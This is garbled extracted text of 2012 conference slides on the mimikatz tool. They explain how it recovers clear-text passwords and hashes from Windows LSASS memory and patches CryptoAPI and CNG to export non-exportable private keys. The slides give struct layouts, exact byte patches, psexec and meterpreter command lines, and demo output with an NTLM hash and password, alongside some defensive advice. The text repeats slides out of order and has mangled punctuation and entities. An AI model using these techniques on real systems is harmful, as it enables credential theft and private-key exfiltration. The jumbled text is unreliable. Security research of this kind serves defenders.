This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
